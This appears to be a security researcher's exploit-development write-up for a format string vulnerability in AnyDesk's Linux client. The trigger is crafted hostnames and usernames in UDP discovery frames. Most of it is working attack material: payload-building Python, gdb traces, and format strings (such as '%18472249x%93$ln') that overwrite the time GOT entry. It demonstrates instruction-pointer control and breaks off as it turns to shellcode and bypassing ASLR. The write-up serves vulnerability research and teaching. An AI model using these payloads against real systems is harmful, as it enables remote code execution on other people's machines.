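When experimenting with different triggers it can be handy to check up front whether a byte sequence really is invalid UTF-8. The following sketch uses Python's strict UTF-8 decoder for this. Note that this is only an approximation: I am assuming that Python and glib agree for simple cases like a stray continuation byte, which is not guaranteed for every edge case. The helper names are made up for this example:

```python
def is_valid_utf8(data: bytes) -> bool:
    """True if Python's strict UTF-8 decoder accepts the data."""
    try:
        data.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


def probe_format(count: int) -> bytes:
    """Build ' 1.%p 2.%p ... <count>.%p' to print the first <count> arguments."""
    return b" " + b" ".join(b"%d.%%p" % i for i in range(1, count + 1))


def make_trigger_hostname(fmt: bytes, bad_prefix: bytes = b"\x85\xfe") -> bytes:
    """Prepend an invalid UTF-8 sequence so the hostname ends up in the error message."""
    if is_valid_utf8(bad_prefix):
        raise ValueError("prefix is valid UTF-8 and would not trigger the error")
    return bad_prefix + fmt


hostname = make_trigger_hostname(probe_format(10))
```

The resulting hostname is the same byte string as the one passed to gen_discover_packet above.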

A few seconds after running the script (up to 5 seconds until the GUI refreshes) our breakpoint is hit:

[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x11c5040 --> 0x21 ('!')
RCX: 0x7ffffffeb898 --> 0x3000000010 
RDX: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 87: Invalid UTF-8 encoded text in name - not valid '\205\376 1.%p 2.%p 3.%p 4.%p 5.%p 6.%p 7.%p 8.%p 9.%p 10.%p'")
RSI: 0x400 
RDI: 0x7ffffffeafd0 --> 0x7 
RBP: 0x5 
RSP: 0x7ffffffeaaf0 --> 0x7ffffffeacc0 --> 0x0 
RIP: 0x8ab346 (call   0x412d90 <vsnprintf@plt>)
R8 : 0x0 
R9 : 0x10 
R10: 0xffffff81 
R11: 0x7ffff1548550 --> 0xfff08320fff08310 
R12: 0x7ffffffeb898 --> 0x3000000010 
R13: 0xb366d8 --> 0x62696c67 ('glib')
R14: 0x1453d80 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 87: Invalid UTF-8 encoded text in name - not valid '\205\376 1.%p 2.%p 3.%p 4.%p 5.%p 6.%p 7.%p 8.%p 9.%p 10.%p'")
R15: 0x4
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffffffeafd0 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 87: Invalid UTF-8 encoded text in name - not valid '\205\376 1.%p 2.%p 3.%p 4.%p 5.%p 6.%p 7.%p 8.%p 9.%p 10.%p'")
arg[3]: 0x7ffffffeb898 --> 0x3000000010 
[------------------------------------stack-------------------------------------]
0000| 0x7ffffffeaaf0 --> 0x7ffffffeacc0 --> 0x0 
0008| 0x7ffffffeaaf8 --> 0x7ffffffeac50 --> 0x20fe85272064696c 
0016| 0x7ffffffeab00 --> 0x158cba0 --> 0x0 
0024| 0x7ffffffeab08 --> 0x7ffffffeac50 --> 0x20fe85272064696c 
0032| 0x7ffffffeab10 --> 0x7ffffffeae70 --> 0x0 
0040| 0x7ffffffeab18 --> 0x7ffff5e379d4 (<g_hash_table_lookup+52>:	mov    r8d,0x2)
0048| 0x7ffffffeab20 --> 0x138ca30 --> 0x11f6ab0 --> 0x11e7340 --> 0x31 ('1')
0056| 0x7ffffffeab28 --> 0x1572280 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 1 "anydesk" hit Breakpoint 1, 0x00000000008ab346 in ?? ()
gdb-peda$ 

The fourth parameter (RCX = 0x7ffffffeb898) is the va_list structure. The first two unsigned ints (4 bytes each) are the members gp_offset and fp_offset:

gdb-peda$ x/2xw 0x7ffffffeb898
0x7ffffffeb898:	0x00000010	0x00000030

After these values both pointers overflow_arg_area and reg_save_area follow:

gdb-peda$ x/2xg 0x7ffffffeb898+8
0x7ffffffeb8a0:	0x00007ffffffeb970	0x00007ffffffeb8b0

Since the value of gp_offset is 0x10, the function which was originally called with variable arguments had two preceding general parameters. In order to display the next four general parameters assumed to be passed in the remaining registers, we need to add gp_offset (0x10) to the reg_save_area pointer (0x00007ffffffeb8b0):

gdb-peda$ x/4xg 0x00007ffffffeb8b0+0x10
0x7ffffffeb8c0:	0x0000000001453d80	0x0000000000000000
0x7ffffffeb8d0:	0x00007ffff1784c40	0x0000000000000010

vsnprintf assumes that these four values were passed in registers. All following values are assumed to be passed via the stack and are referenced by the overflow_arg_area pointer (0x00007ffffffeb970):

gdb-peda$ x/6xg 0x00007ffffffeb970
0x7ffffffeb970:	0x0000000000b366d8	0x0000000000000000
0x7ffffffeb980:	0x0000000001482b01	0x00007ffff5e4ee24
0x7ffffffeb990:	0x0000000001453d80	0x0000000000000000
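
The va_list members inspected above can also be decoded programmatically. The following is only a minimal Python 3 sketch: the raw bytes are rebuilt from the gdb output shown above, and the helper name parse_va_list is made up for illustration. It assumes the usual System V AMD64 layout (two 32-bit offsets followed by two 64-bit pointers) and six general purpose argument registers of 8 bytes each.

```python
import struct

# The 24 bytes of the va_list at 0x7ffffffeb898, rebuilt from the two gdb
# dumps above (x86-64 is little-endian).
raw_va_list = struct.pack('<IIQQ', 0x10, 0x30,
                          0x00007ffffffeb970, 0x00007ffffffeb8b0)

GP_REG_BYTES = 6 * 8  # rdi, rsi, rdx, rcx, r8, r9 are saved as 8 bytes each


def parse_va_list(data):
    """Split a raw va_list into its four members (hypothetical helper)."""
    gp_offset, fp_offset, overflow_arg_area, reg_save_area = \
        struct.unpack('<IIQQ', data)
    return {
        'gp_offset': gp_offset,
        'fp_offset': fp_offset,
        'overflow_arg_area': overflow_arg_area,
        'reg_save_area': reg_save_area,
    }


va = parse_va_list(raw_va_list)

# Registers already consumed by named parameters of the variadic function.
named_gp_args = va['gp_offset'] // 8
# Variadic arguments that are still read from the register save area.
register_args_left = (GP_REG_BYTES - va['gp_offset']) // 8
# Address of the first value vsnprintf will fetch.
first_vararg_slot = va['reg_save_area'] + va['gp_offset']

print(named_gp_args)           # 2
print(register_args_left)      # 4
print(hex(first_vararg_slot))  # 0x7ffffffeb8c0
```

The three printed values match what was read manually in gdb: two named parameters, four remaining register slots and the first accessible value at 0x7ffffffeb8c0.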

By entering ni the call to vsnprintf is made and we can inspect the resulting string (set print elements 0 displays the whole string without truncation):

gdb-peda$ ni
...
gdb-peda$ set print elements 0
gdb-peda$ x/s 0x7ffffffeafd0
0x7ffffffeafd0:	"Failed to set text from markup due to error parsing markup: Error on line 1 char 87: Invalid UTF-8 encoded text in name - not valid '\205\376 1.0x1453d80 2.(nil) 3.0x7ffff1784c40 4.0x10 5.0xb366d8 6.(nil) 7.0x1482b01 8.0x7ffff5e4ee24 9.0x1453d80 10.(nil)'"

The first four parameters were indeed taken from the reg_save_area and all following values from the overflow_arg_area. The following picture summarizes the structure:

Gaining arbitrary write

Now that we know what the format string can access, we need to find data within this accessible range that we control. If we directly controlled data within the reg_save_area or overflow_arg_area, we could store the address of the time GOT entry there and write to it using the %n format specifier.

Within the reg_save_area there are only four values we can access, and none of them contains any of our input. All following parameters are stored in the overflow_arg_area. Let’s have a look at the first 50 values stored there using the telescope command:

gdb-peda$ telescope 0x00007ffffffeb970 50
0000| 0x7ffffffeb970 --> 0xb366d8 --> 0x62696c67 ('glib')
0008| 0x7ffffffeb978 --> 0x0 
0016| 0x7ffffffeb980 --> 0x1530801 --> 0xe000007ffff17853 
0024| 0x7ffffffeb988 --> 0x7ffff5e4ee24 (test   eax,eax)
0032| 0x7ffffffeb990 --> 0x167ec00 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 87: Invalid UTF-8 encoded text in name - not valid '\205\376 1,%p 2.%p 3.%p 4.%p 5.%p 6.%p 7.%p 8.%p 9.%p 10.%p'")
0040| 0x7ffffffeb998 --> 0x0 
0048| 0x7ffffffeb9a0 --> 0x10 
0056| 0x7ffffffeb9a8 --> 0x7ffff5e501cd (<g_logv+605>:	mov    eax,r14d)
0064| 0x7ffffffeb9b0 --> 0x7ffff7a5389b --> 0x4b544700006b7447 ('Gtk')
0072| 0x7ffffffeb9b8 --> 0x167ec00 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 87: Invalid UTF-8 encoded text in name - not valid '\205\376 1,%p 2.%p 3.%p 4.%p 5.%p 6.%p 7.%p 8.%p 9.%p 10.%p'")
0080| 0x7ffffffeb9c0 --> 0x1fffeb9d0 
0088| 0x7ffffffeb9c8 --> 0x4342b0 (push   rbp)
0096| 0x7ffffffeb9d0 --> 0x0 
0104| 0x7ffffffeb9d8 --> 0x7ffff7a5389b --> 0x4b544700006b7447 ('Gtk')
0112| 0x7ffffffeb9e0 --> 0x7ffffffeba18 --> 0x7ffff1431f9b (<__GI___libc_realloc+875>:	mov    r8,QWORD PTR [rsp+0x8])
0120| 0x7ffffffeb9e8 --> 0x0 
0128| 0x7ffffffeb9f0 --> 0x155dd20 --> 0x7fffdc00f3d0 --> 0x1514300 --> 0x1513da0 --> 0x14d6e00 (--> ...)
0136| 0x7ffffffeb9f8 --> 0x0 
0144| 0x7ffffffeba00 --> 0x500000000 
0152| 0x7ffffffeba08 --> 0x7ffff5e9acd8 ("Invalid UTF-8 encoded text in name - not valid '%s'")
0160| 0x7ffffffeba10 --> 0x0 
0168| 0x7ffffffeba18 --> 0x7ffff1431f9b (<__GI___libc_realloc+875>:	mov    r8,QWORD PTR [rsp+0x8])
0176| 0x7ffffffeba20 --> 0x7ffff5e969e1 --> 0x4600303262696c67 ('glib20')
...

We can see a few occurrences of the heap address of the format string. Although we control parts of the content of the format string, we do not control its address, and a controllable address is what we would need. Searching even further down the stack does not yield any data we control either. So it seems that none of the data we can access with the format string is under our control. Is this already a dead end? Of course not!

Taking a look at the values above again, we can see that there are stack addresses stored on the stack. There are even stack addresses, which reference the area we can access. For example at offset 112 the stack address 0x7ffffffeba18 is stored, which corresponds to offset 168:

...
0112| 0x7ffffffeb9e0 --> 0x7ffffffeba18 --> 0x7ffff1431f9b (<__GI___libc_realloc+875>:	mov    r8,QWORD PTR [rsp+0x8])
...
0168| 0x7ffffffeba18 --> 0x7ffff1431f9b (<__GI___libc_realloc+875>:	mov    r8,QWORD PTR [rsp+0x8])
...

If we use the appropriate argument selector we can use this stack address to write to the area we can access. We can then use another argument selector to reference the data we wrote. The following picture visualizes the basic idea:

The problem here is that we cannot do this in a single call of vsnprintf. All referenced data is fetched before data is written by the %n format specifier. This means that the %19$ln would indeed overwrite the data on the stack, but the %26$ln would still evaluate to the old value, which was stored there. Accordingly we need two calls:

  1. Store address of time GOT entry on the stack
  2. Write to previously stored GOT entry address in order to control instruction pointer
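
The argument selectors mentioned above (%19$ln and %26$ln) follow directly from the va_list layout. The sketch below is a small Python 3 helper (the function name is made up for illustration) that converts an offset within the overflow_arg_area, as displayed by telescope, into the matching selector. It assumes gp_offset is 0x10 as observed above and that every argument occupies one 8-byte slot.

```python
GP_REG_BYTES = 6 * 8  # size of the general purpose part of the reg_save_area


def selector_for_overflow_offset(offset, gp_offset=0x10):
    """Return N so that %N$... references overflow_arg_area + offset."""
    if offset % 8 != 0:
        raise ValueError('stack slots are 8 bytes wide')
    # Arguments 1..register_args are read from the reg_save_area.
    register_args = (GP_REG_BYTES - gp_offset) // 8
    # Selectors are 1-based, hence the +1.
    return register_args + offset // 8 + 1


print(selector_for_overflow_offset(112))  # 19
print(selector_for_overflow_offset(168))  # 26
```

Offset 112 holds the stack pointer and offset 168 is the slot it points to, which gives the pair %19$ln and %26$ln.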

As you may remember, the vulnerable call to vsnprintf is actually made twice for the very same format string. It turned out, however, that the call paths of these two calls differ, and so does the stack layout. This means that an argument selector (e.g. %26$ln) on the first call will not reference the same value on the second call. We also need to keep in mind that we cannot change the format string in between the two calls. If we e.g. use %200$n on the first call to write the GOT address to the stack, we need to ensure that %200$n on the second call also references a writable address, because otherwise we trigger a segmentation fault. This is true not only for the %n we use to store the GOT address, but also for the second %n, which we need in order to actually write to the GOT entry. Unfortunately there did not seem to be any values on the stack that fulfill these requirements.

Thus we need another approach. The first thing that came to my mind was to send two independent announcement frames. We need to trigger the vulnerability twice, so let’s just trigger it twice via the initial attack vector. Because of the duplicate call this actually results in four calls to vsnprintf. We still must ensure that the %n used on the respective first call also references a writable memory location on the associated second call, but since we only need one %n format specifier in each pair of calls, stack values that fulfill this requirement can be found.

Although the approach using two separate announcement frames seemed to work, I did not really like it. One reason for this is the duplicate call of vsnprintf. We must accept that the second call writes somewhere into memory even though it is not relevant for our exploit. Also the two announcement frames may interfere with legitimate announcement frames, which are sent in the same time window (the GUI gets updated only every 5 seconds). These aspects may reduce the reliability of the exploit.

While thinking about this and looking at the GUI, another idea came to my mind:

The GUI displays not only the hostname, but also the username. So far we triggered the vulnerability only by using the hostname. But the username should also be prone to this. Let’s verify this by sending the following announcement frame:

p = gen_discover_packet(4919, 1, '\x85\xfeHOSTNAME %p', '\x85\xfeUSERNAME %p', 'ad', 'main')

After a few seconds the GUI updates and the breakpoint on the vsnprintf call is hit:

[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffffffeafd0 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 47: Invalid UTF-8 encoded text in name - not valid '\205\376USERNAME %p'")
arg[3]: 0x7ffffffeb898 --> 0x3000000010 

Inspecting the format string (third parameter) we can see that the username indeed triggered the vulnerability. After continuing the execution the breakpoint is hit again:

[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffffffeafd0 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 47: Invalid UTF-8 encoded text in name - not valid '\205\376HOSTNAME %p'")
arg[3]: 0x7ffffffeb898 --> 0x3000000010 

This time the vulnerability was triggered by the hostname. If we further continue the execution both calls (for username and hostname) are repeated.

Thus we verified that the vulnerability can be triggered using both the hostname and the username. This is good news for our exploit, because we can now use two independent format strings, which are sent in a single UDP packet and are both evaluated before the duplicate call is triggered.

What we have to do now is to find an accessible stack address to which we will write the GOT address. For this we must keep in mind that the values on the stack may change or get overwritten between the two vsnprintf calls. If we write to a stack address that is too close to the top of the stack, it is very likely that it has been overwritten by the time of the second call. Finding a suitable value is only a matter of trial and error: we write to an address on the first call and then verify that the value we wrote is still the same on the second call.

The stack address 0x7ffffffebe70, which can be accessed using the argument selector %93$ln fits our needs:

[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffffffeafd0 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 51: Invalid UTF-8 encoded text in name - not valid '\205\376USERNAME %93$ln'")
arg[3]: 0x7ffffffeb898 --> 0x3000000010 
[------------------------------------stack-------------------------------------]
0000| 0x7ffffffeaaf0 --> 0x7ffffffeacc0 --> 0x0 
0008| 0x7ffffffeaaf8 --> 0x7ffffffeac50 --> 0x55fe85272064696c 
0016| 0x7ffffffeab00 --> 0x171f0c0 --> 0x0 
0024| 0x7ffffffeab08 --> 0x7ffffffeac50 --> 0x55fe85272064696c 
0032| 0x7ffffffeab10 --> 0x7ffffffeae70 --> 0x0 
0040| 0x7ffffffeab18 --> 0x7ffff5e379d4 (<g_hash_table_lookup+52>:	mov    r8d,0x2)
0048| 0x7ffffffeab20 --> 0x138b230 --> 0x11f6ab0 --> 0x11e7340 --> 0x31 ('1')
0056| 0x7ffffffeab28 --> 0x1715ca0 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 1 "anydesk" hit Breakpoint 2, 0x00000000008ab346 in ?? ()
gdb-peda$ telescope 0x00007ffffffeb970 100
...
0704| 0x7ffffffebc30 --> 0x7ffffffebe70 --> 0x6ffffec070
...

After the first call the value 0x90 (the characters written so far) is written to 0x7ffffffebe70:

gdb-peda$ ni
...
[-------------------------------------code-------------------------------------]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
   0x8ab346:	call   0x412d90 <vsnprintf@plt>
=> 0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
   0x8ab35c:	call   0x4123d0 <gettimeofday@plt>
[------------------------------------stack-------------------------------------]
0000| 0x7ffffffeaaf0 --> 0x7ffffffeacc0 --> 0x0 
0008| 0x7ffffffeaaf8 --> 0x7ffffffeac50 --> 0x55fe85272064696c 
0016| 0x7ffffffeab00 --> 0x171f0c0 --> 0x0 
0024| 0x7ffffffeab08 --> 0x7ffffffeac50 --> 0x55fe85272064696c 
0032| 0x7ffffffeab10 --> 0x7ffffffeae70 --> 0x0 
0040| 0x7ffffffeab18 --> 0x7ffff5e379d4 (<g_hash_table_lookup+52>:	mov    r8d,0x2)
0048| 0x7ffffffeab20 --> 0x138b230 --> 0x11f6ab0 --> 0x11e7340 --> 0x31 ('1')
0056| 0x7ffffffeab28 --> 0x1715ca0 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00000000008ab34b in ?? ()
gdb-peda$ x/xg 0x7ffffffebe70
0x7ffffffebe70:	0x0000000000000090
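
The value 0x90 can be reproduced by counting what vsnprintf has emitted before it reaches the %93$ln specifier. The following Python 3 lines are only a sketch of that count; the 133 characters for the fixed part of the error message are the figure used throughout this article, and the variable names are made up for illustration.

```python
ERROR_PREFIX_LEN = 133  # fixed part of the error message up to the opening quote

username = b'\x85\xfeUSERNAME %93$ln'

# Everything in front of the first '%' is copied to the output literally.
literal_part = username.split(b'%', 1)[0]

written_before_n = ERROR_PREFIX_LEN + len(literal_part)
print(hex(written_before_n))  # 0x90
```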

When the breakpoint is hit again on the second call, the value is still the same:

gdb-peda$ c
Continuing.
...
[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffffffeafd0 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 51: Invalid UTF-8 encoded text in name - not valid '\205\376HOSTNAME %165$p'")
arg[3]: 0x7ffffffeb898 --> 0x3000000010 
[------------------------------------stack-------------------------------------]
0000| 0x7ffffffeaaf0 --> 0x2249 ('I"')
0008| 0x7ffffffeaaf8 --> 0x2bc 
0016| 0x7ffffffeab00 --> 0x158c710 --> 0x0 
0024| 0x7ffffffeab08 --> 0x5ecbad94 
0032| 0x7ffffffeab10 --> 0x5ecbad94 
0040| 0x7ffffffeab18 --> 0xab240 
0048| 0x7ffffffeab20 --> 0xdd73d0 --> 0x8c3200 (mov    QWORD PTR [rdi],0xdd73d0)
0056| 0x7ffffffeab28 --> 0x3 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 1 "anydesk" hit Breakpoint 1, 0x00000000008ab346 in ?? ()
gdb-peda$ x/xg 0x7ffffffebe70
0x7ffffffebe70:	0x0000000000000090

On the second call we can access the value using the argument selector %165$p (offset 1280):

gdb-peda$ telescope 0x00007ffffffeb970 200
...
1280| 0x7ffffffebe70 --> 0x90
...

Controlling the instruction pointer

Now we are finally ready to overwrite the GOT entry of time. At first let’s determine the address of the GOT entry:

gdb-peda$ p/x &'time@got.plt'
$1 = 0x119ddc0

Accordingly the GOT entry of time is stored at 0x119ddc0. In order to write this value, we can pad the output of vsnprintf using a field width. If you are not familiar with this, please refer to my writeup on RPISEC/MBE lab04B. The error message itself (Failed to set text from markup ...) contains 133 characters. In addition we need to account for the two bytes of the invalid UTF-8 sequence. Thus we have to pad the output by another 18472249 characters:

0x119ddc0 = 18472384 (time GOT)
18472384 - 133 - 2 = 18472249
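
The same arithmetic as a small Python 3 sketch, so that it can be repeated for other target values. The helper name field_width_for is made up for illustration; the prefix length of 133 and the two invalid UTF-8 bytes are the figures from above.

```python
ERROR_PREFIX_LEN = 133   # characters of the fixed error message
INVALID_UTF8_LEN = 2     # the leading \x85\xfe bytes


def field_width_for(target_value):
    """Field width needed so that a following %n stores target_value."""
    width = target_value - ERROR_PREFIX_LEN - INVALID_UTF8_LEN
    if width <= 0:
        raise ValueError('target is smaller than the unavoidable prefix')
    return width


time_got = 0x119ddc0
width = field_width_for(time_got)
print(width)                           # 18472249
print('%{}x%93$ln'.format(width))      # %18472249x%93$ln
```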

Let’s verify this by sending the following announcement frame:

p = gen_discover_packet(4919, 1, '\x85\xfeHOSTNAME %165$p', '\x85\xfe%18472249x%93$ln', 'ad', 'main')

After the first call to vsnprintf the target stack address (0x7ffffffebe70) actually contains the GOT address of time:

[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffffffeafd0 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 52: Invalid UTF-8 encoded text in name - not valid '\205\376%18472249x%93$ln'")
arg[3]: 0x7ffffffeb898 --> 0x3000000010 
...
gdb-peda$ x/xg 0x7ffffffebe70
0x7ffffffebe70:	0x0000006ffffec070
gdb-peda$ ni
...
gdb-peda$ x/xg 0x7ffffffebe70
0x7ffffffebe70:	0x000000000119ddc0

The %165$p format specifier on the second call successfully references the GOT address:

[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffffffeafd0 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 51: Invalid UTF-8 encoded text in name - not valid '\205\376HOSTNAME %165$p'")
arg[3]: 0x7ffffffeb898 --> 0x3000000010 
...
gdb-peda$ ni
gdb-peda$ x/s 0x7ffffffeafd0
0x7ffffffeafd0:	"Failed to set text from markup due to error parsing markup: Error on line 1 char 51: Invalid UTF-8 encoded text in name - not valid '\205\376HOSTNAME 0x119ddc0'"

The next step is to replace the %p format specifier with %ln in order to write an 8-byte value to the GOT entry on the second call. This way we should be able to control the instruction pointer when the call to time is made right after the vsnprintf call. Let’s verify this by writing the value 0x1337:

0x1337 = 4919
4919 - 133 - 2 = 4784

This time we adjust the hostname accordingly:

p = gen_discover_packet(4919, 1, '\x85\xfe%4784x%165$ln', '\x85\xfe%18472249x%93$ln', 'ad', 'main')

After sending the frame and continuing to the second call to vsnprintf, the GOT entry of time is still untouched:

[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffffffeafd0 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 49: Invalid UTF-8 encoded text in name - not valid '\205\376%4784x%165$ln'")
arg[3]: 0x7ffffffeb898 --> 0x3000000010 
[------------------------------------stack-------------------------------------]
0000| 0x7ffffffeaaf0 --> 0x2743 ("C'")
0008| 0x7ffffffeaaf8 --> 0x357 
0016| 0x7ffffffeab00 --> 0x158cf10 --> 0x0 
0024| 0x7ffffffeab08 --> 0x5ecbb8cc 
0032| 0x7ffffffeab10 --> 0x5ecbb8cc 
0040| 0x7ffffffeab18 --> 0xd0f51 
0048| 0x7ffffffeab20 --> 0xdd73d0 --> 0x8c3200 (mov    QWORD PTR [rdi],0xdd73d0)
0056| 0x7ffffffeab28 --> 0x3 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 1 "anydesk" hit Breakpoint 1, 0x00000000008ab346 in ?? ()
gdb-peda$ x/xg 0x119ddc0
0x119ddc0 <time@got.plt>:	0x00007ffff7ffb930

By executing the vsnprintf call the value 0x1337 is successfully written:

gdb-peda$ ni
...
gdb-peda$ x/xg 0x119ddc0
0x119ddc0 <time@got.plt>:	0x0000000000001337

If we now continue the execution, the immediately following call to time raises a segmentation fault with the instruction pointer being 0x1337:

gdb-peda$ c
Continuing.

Thread 1 "anydesk" received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x1338 
RBX: 0x11c5040 --> 0x21 ('!')
RCX: 0x0 
RDX: 0x0 
RSI: 0x7ffff1784ca0 --> 0x16c1400 --> 0x276e00 ('')
RDI: 0x7ffffffeab08 --> 0x5ecbb8cc 
RBP: 0x5 
RSP: 0x7ffffffeaae8 --> 0x8ab355 (lea    rdi,[rsp+0x20])
RIP: 0x1337 
R8 : 0x1 
R9 : 0x6e ('n')
R10: 0x1 
R11: 0xa ('\n')
R12: 0x7ffffffeb898 --> 0x3000000018 
R13: 0xb366d8 --> 0x62696c67 ('glib')
R14: 0x1453ea0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 49: Invalid UTF-8 encoded text in name - not valid '\205\376%4784x%165$ln'")
R15: 0x4
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x1337
[------------------------------------stack-------------------------------------]
0000| 0x7ffffffeaae8 --> 0x8ab355 (lea    rdi,[rsp+0x20])
0008| 0x7ffffffeaaf0 --> 0x2743 ("C'")
0016| 0x7ffffffeaaf8 --> 0x357 
0024| 0x7ffffffeab00 --> 0x158cf10 --> 0x0 
0032| 0x7ffffffeab08 --> 0x5ecbb8cc 
0040| 0x7ffffffeab10 --> 0x5ecbb8cc 
0048| 0x7ffffffeab18 --> 0xd0f51 
0056| 0x7ffffffeab20 --> 0xdd73d0 --> 0x8c3200 (mov    QWORD PTR [rdi],0xdd73d0)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000001337 in ?? ()

We successfully control the instruction pointer.

Hitting our shellcode: dynamic field width

Next we must decide where to point the instruction pointer. At the very beginning we figured out that the security mechanisms of the binary are quite weak. In fact the heap, where the format string we control is stored, is executable:

gdb-peda$ vmmap 0x1453ea0
Start              End                Perm	Name
0x011c4000         0x017c8000         rwxp	[heap]

This means that we can store shellcode within the format string and redirect the instruction pointer to it. However, we need to keep in mind that we manually disabled ASLR and in fact do not know any heap address. A common approach to bypass ASLR is to leak a memory address. Especially for basic format string vulnerabilities this is usually easy to achieve. In this case, however, we don’t get any response from the application. The result of the format string is written to the log file, which we don’t have access to. Thus we cannot leak any heap address.

Nevertheless we can successfully bypass ASLR using a dynamic field width. Since this does not seem to be very well-known, let’s have a look at a short example. We have already used the ordinary field width in order to pad the output effectively increasing the amount of characters written, which makes %n write a bigger value:

user@w00d:~$ cat sample1.c
#include <stdio.h>

int main() {

  int out;
  printf("%100x%1$n", &out);
  printf("\nout = %d\n", out);

  return 0;
}

The %100x format specifier prints the first argument as a hexadecimal number, which is padded to 100 characters. Accordingly 100 characters are written. This amount will be written to the out variable by using the %1$n format specifier:

